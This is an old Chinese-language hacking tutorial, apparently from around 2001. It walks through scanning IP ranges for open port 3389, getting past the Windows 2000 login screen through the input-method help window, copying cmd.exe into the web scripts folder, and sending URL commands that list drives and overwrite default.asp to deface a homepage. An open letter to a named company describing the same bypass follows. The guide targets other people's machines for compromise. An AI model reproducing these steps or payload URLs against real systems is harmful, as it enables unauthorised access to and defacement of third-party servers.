第一. 准备工作
扫描工具SuperScan203
控制软件Win2000终端服务客户端
第二步.打开SuperScan203在端口设置里添加端口3389
一般扫描一个c类网址比快你要是扫描一个b 类的网段我也不反对!但是会很慢不过会找到很多肉机.

第三步.打开Win2000终端服务客户端添加扫描到的3389端口的主机添加到IP栏里!然后点连接就可以了!
如果连接上了会出现windows2000的登陆窗口，按下CTRL+SHIFT键，出现全拼输入法!

第四步.在输入法状态条上按mouse右键，选择帮助，选择输入指南，选择"选项"按右键

第五步.选择"跳转到URL"，输入：c:\winnt\system32\cmd.exe.

第六步.选择"保存到磁盘"。

第七步.选择保存目录：c:\inetpub\scripts\

第八步.打开IE，输入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ （知道了吧）

第九步.输入：
xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp(黑掉了主页)

第十步.怎么获得管理员权限!

在这里我就不说了!因为我认为这样不好!所以就不说了!

如果你愿意自己去想吧!

下面我公开一封我写给我黑掉的网站网络管理员的公开信!

侄： 昊源诚业科技发展有限公司四川票证查询挂失网络服务中心 各位四川票证查询挂失网络服务中心网站和昊源诚业科技发展有限公司领导你门好！这是一封很重要的来信请你们仔细阅读！贵网站存在着严重的漏洞！请各位领导妥善解决！因为贵网站存在的漏洞会导致黑客入侵！会给网站肇成巨大损失！我先描述一下黑客入侵后回给网站肇成的后果！入侵者可以根据贵网站的漏洞进入该网站电脑系统肇成网站网页被黑。质料丢失。严重的会导致网站主机被格式化！数据丢失！给贵网站肇成不可估计的损失！下面本人描述一下黑客入侵的详细操作！ 描述： 黑客在登陆界面将光标移至用户名输入框，按键盘上的Ctrl+Shift键，这时在缺省的安装状态下会出现输入法状态条，将鼠标移至输入法状态条点击鼠标右键，出现的对话框中选择帮助，选择操作指南或输入法入门（微软的拼音输入法和智能ABC没有这个选项），在出现的操作指南或输入法入门窗口中会出现几个按钮，关键是选项按钮。如果是未安装Service Pack 1或IE5.5的Windows2000系统，用鼠标左键点击选项按钮，在出现的对话框中选择主页，这时在已出现的帮助窗口的右侧会出现IE浏览器界面中的此页不可显示页面，其中有个检测网络设置的链接，点击它就会出现网络设置选项，黑客可以对网络设置甚至控制面板做任何修改。用鼠标左键点击选项按钮，在出现的对话框中选择Internet选项，黑客也可以对主页、连结，安全、高级选项等做任何修改。最为严重的是用鼠标右键点击选项按钮会出现一个对话框，选择跳至URL，这时会出现一个对话框，其中有一个跳至该URL输入框，在其中输入黑客想看到的路径比如c:\ 那么这时在已出现的帮助窗口的右侧会出现资源管理器c盘的界面显示，黑客这时已经是系统管理员权限可以对你看到的数据做任何的操作，这样黑客就绕过了Windows2000的登陆验证机制！ 如果安装了Service Pack 1或IE5.5的Windows2000系统，网络设置选项不可以执行，但 Internet选项仍可执行。资源管理器界面仍可出现，通过路径输入，所有的文件夹中的文件和根目录下的文件都可看到但已不能直接对文件夹和文件进行操作，但黑客仍可以用鼠标右键点击文件夹和文件选择进行删除，彻底删除（按着Shift键），重命名，和发送到软盘等操作甚至可以格式化磁盘！或者用鼠标右键点击空白处选择Web或缩略图察看方式，会对一些可以显示的文件造成泄密。还有黑客还可以用鼠标右键点击资源管理器界面左上角的盘符或者任意文件夹或能看到任意的文件，在盘符和文件夹出现的对话框中选择共享，在单个文件出现的对话框中选择属性，黑客可以任意添加共享权限，比如Everyone，黑客可以选择完全控制选项，这样只要这台机器如果在网络黑客仍可以通过网络远程登陆完全控制所有数据资料！就是说黑客无论通过网络远程登陆或者物理接近装有Windows2000系统的计算机，那么黑客就可控制一切！ 解决发法： 此漏洞存在于一切具有多种输入法的Windows2000系统中，经过这样不正常的操作，正常登陆以后还会随机出现各种程序运行错误。暂时的解决方法为：控制面板中选择区域选项中的输入法区域选项，选中启用任务栏上指示器复选框，留下你最擅长的一种输入法其余的输入法全部删除，其中内码输入法一定要删除！因为下述方法对内码输入法无效，然后在任务栏上用鼠标左键点击输入法图标的笔型图标选择关闭输入法状态。 如果贵网站还有不明白之处请让本网站网络管理员与本人联系 2001年5月 辽宁省一计算机爱好者： H I V 本人在此声明本人没有入侵贵站系统！

要有不懂的地方不要来找我自己去想!&OK&????????